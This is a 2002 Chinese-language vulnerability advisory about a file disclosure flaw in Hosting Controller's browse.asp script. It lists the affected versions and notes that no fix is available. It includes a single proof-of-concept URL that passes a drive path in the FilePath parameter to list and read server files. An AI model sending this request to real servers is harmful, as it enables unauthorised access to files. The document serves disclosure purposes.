Hosting Controller Browse.ASP造成文件泄露漏洞

发布时间：2002-05-23
更新时间：2002-05-23
严重程度：中
威胁程度：远程非授权文件存取
错误类型：输入验证错误
利用方式：服务器模式

BUGTRAQ ID：4778

受影响系统

Hosting Controller Hosting Controller 1.1
   - Microsoft Windows 2000 Advanced Server
   - Microsoft Windows 2000 Advanced Server SP1
   - Microsoft Windows 2000 Advanced Server SP2
   - Microsoft Windows 2000 Professional
   - Microsoft Windows 2000 Professional SP1
   - Microsoft Windows 2000 Professional SP2
   - Microsoft Windows NT Server 4.0
   - Microsoft Windows NT Server 4.0 SP1
   - Microsoft Windows NT Server 4.0 SP2
   - Microsoft Windows NT Server 4.0 SP3
   - Microsoft Windows NT Server 4.0 SP4
   - Microsoft Windows NT Server 4.0 SP5
   - Microsoft Windows NT Server 4.0 SP6a
Hosting Controller Hosting Controller 1.3
   - Microsoft Windows 2000 Advanced Server
   - Microsoft Windows 2000 Advanced Server SP1
   - Microsoft Windows 2000 Advanced Server SP2
   - Microsoft Windows 2000 Professional
   - Microsoft Windows 2000 Professional SP1
   - Microsoft Windows 2000 Professional SP2
   - Microsoft Windows NT Server 4.0
   - Microsoft Windows NT Server 4.0 SP1
   - Microsoft Windows NT Server 4.0 SP2
   - Microsoft Windows NT Server 4.0 SP3
   - Microsoft Windows NT Server 4.0 SP4
   - Microsoft Windows NT Server 4.0 SP5
   - Microsoft Windows NT Server 4.0 SP6a
Hosting Controller Hosting Controller 1.4 b
   - Microsoft Windows 2000 Advanced Server
   - Microsoft Windows 2000 Advanced Server SP1
   - Microsoft Windows 2000 Advanced Server SP2
   - Microsoft Windows 2000 Professional
   - Microsoft Windows 2000 Professional SP1
   - Microsoft Windows 2000 Professional SP2
   - Microsoft Windows NT Server 4.0
   - Microsoft Windows NT Server 4.0 SP1
   - Microsoft Windows NT Server 4.0 SP2
   - Microsoft Windows NT Server 4.0 SP3
   - Microsoft Windows NT Server 4.0 SP4
   - Microsoft Windows NT Server 4.0 SP5
   - Microsoft Windows NT Server 4.0 SP6a
Hosting Controller Hosting Controller 1.4
   - Microsoft Windows 2000 Advanced Server
   - Microsoft Windows 2000 Advanced Server SP1
   - Microsoft Windows 2000 Advanced Server SP2
   - Microsoft Windows 2000 Professional
   - Microsoft Windows 2000 Professional SP1
   - Microsoft Windows 2000 Professional SP2
   - Microsoft Windows NT Server 4.0
   - Microsoft Windows NT Server 4.0 SP1
   - Microsoft Windows NT Server 4.0 SP2
   - Microsoft Windows NT Server 4.0 SP3
   - Microsoft Windows NT Server 4.0 SP4
   - Microsoft Windows NT Server 4.0 SP5
   - Microsoft Windows NT Server 4.0 SP6a
Hosting Controller Hosting Controller 1.4.1
   - Microsoft Windows 2000 Advanced Server
   - Microsoft Windows 2000 Advanced Server SP1
   - Microsoft Windows 2000 Advanced Server SP2
   - Microsoft Windows 2000 Server
   - Microsoft Windows 2000 Server SP1
   - Microsoft Windows 2000 Server SP2
   - Microsoft Windows NT Server 4.0
   - Microsoft Windows NT Server 4.0 SP1
   - Microsoft Windows NT Server 4.0 SP2
   - Microsoft Windows NT Server 4.0 SP3
   - Microsoft Windows NT Server 4.0 SP4
   - Microsoft Windows NT Server 4.0 SP5
   - Microsoft Windows NT Server 4.0 SP6
   - Microsoft Windows NT Server 4.0 SP6a

详细描述
'browse.asp'脚本对用户输入缺少过滤，提供恶意值给URL参数可导致读取任意文件内容和目录。

测试代码
http://target/admin/browse.asp?FilePath=c:\&Opt=2&level=0

解决方案
尚无

相关信息
Bao Dai Nhan <baodainhan@fptnet.com>.
参考：http://online.securityfocus.com/archive/1/273176
相关主页：http://www.hostingcontroller.com/

最近严重漏洞

Hosting Controller Browse.ASP造成文件泄露漏洞